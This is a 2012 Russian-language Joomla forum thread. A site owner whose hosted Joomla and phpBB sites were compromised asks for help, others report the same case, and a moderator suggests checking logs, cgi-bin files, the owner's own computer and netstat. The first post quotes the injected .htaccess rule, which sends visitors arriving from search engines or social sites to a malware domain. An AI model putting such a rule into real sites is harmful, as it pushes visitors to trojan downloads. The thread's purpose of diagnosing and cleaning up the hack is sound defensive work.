Помогите определить степень угрозы

Тема в разделе "Вопросы безопасности", создана пользователем Mazormedia, 30.03.2012.

  1. Offline

    Mazormedia Недавно здесь

    Регистрация:
    26.03.2012
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    Привет знатокам

    Я в этом мало что понимаю, но кратко рассказываю суть:
    1. Сайты открываются и работают, однако, если перейти к ним по ссылке с других сайтов, социалок или через поиск, то вылетает редирект и Eset Smart Security ловит троян.
    2. Оказались все 20 сайтов на Joomla 1.5, 2.5 и форум PhpBB взломанными на моем хостинге Timeweb.
    3. Обнаружены .htaccess с редиректами типа:
    ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|)\.(.*)
    RewriteRule ^(.*)$ http://tropas.ru/in.cgi?4 [R=301,L]

    4. Удалил все эти файлы, восстановил их из бекапов.
    5. Утром все повторилось, обнаружил поврежденный файл .htaccess в корне хостинга (не сайта, а хостинга), а к нему еще какой-то .authfile - удалил оба, сменил пароль админа хостинга, подменил поврежденные файлы .htaccess в папках сайтов.
    6. Повторилось.


    Вопросы:
    1. Что происходит?
    2. Взломали мой аккаунт на хостинге, FTP или все это развивается на уровне сайтов?
    3. Как может файл htaccess появляться в корне хостинга, т.е. выше public_html, выше корня сайта, там, где я вижу все папки с сайтами?
    4. Что делать?
     
  2.  
  3. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Конечно если заливают файлы в каталог хостинга виртуального,то открыт доступ к хостингу.
     
  4. Offline

    ovadimo Недавно здесь

    Регистрация:
    12.10.2011
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    У меня та же история. И что теперь делать?
     
  5. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Смотреть логи хостинга и время создания файла
     
  6. Offline

    spawnsanya Недавно здесь

    Регистрация:
    18.02.2011
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Аналогичная проблема, этот файл был изменен сегодня ночью. Смена паролей фтп может полностью избавиться от этой проблемы?
     
  7. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    spawnsanya,
    И хостер тот же?
     
  8. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Ну еще проверить свой комп,авторов etc
     
  9. Offline

    spawnsanya Недавно здесь

    Регистрация:
    18.02.2011
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    ага тоже timeweb!!!
     
  10. Offline

    spawnsanya Недавно здесь

    Регистрация:
    18.02.2011
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Эту проблему кто-нибудь решил???? у меня опять сменился файл
     
  11. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Так не у каждого одинаковый случай. Стучи к хостеру. Ищи файлы созданные недавно в папке cgi-bin
     
  12. Offline

    Yagnenok Недавно здесь

    Регистрация:
    16.01.2010
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    я проверил проверь комп свежим антивирем, посмотрел фтп логи, удалил всех фтп пользователей, зачистил лишнее из htaccess, удалил все из папок tmp и cache. Пока все норм. Думаю троян сидит глубоко в системе, думаю переустановиться полностью систему.
     
  13. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    cmd.exe netstat -anb
     

Поделиться этой страницей

Загрузка...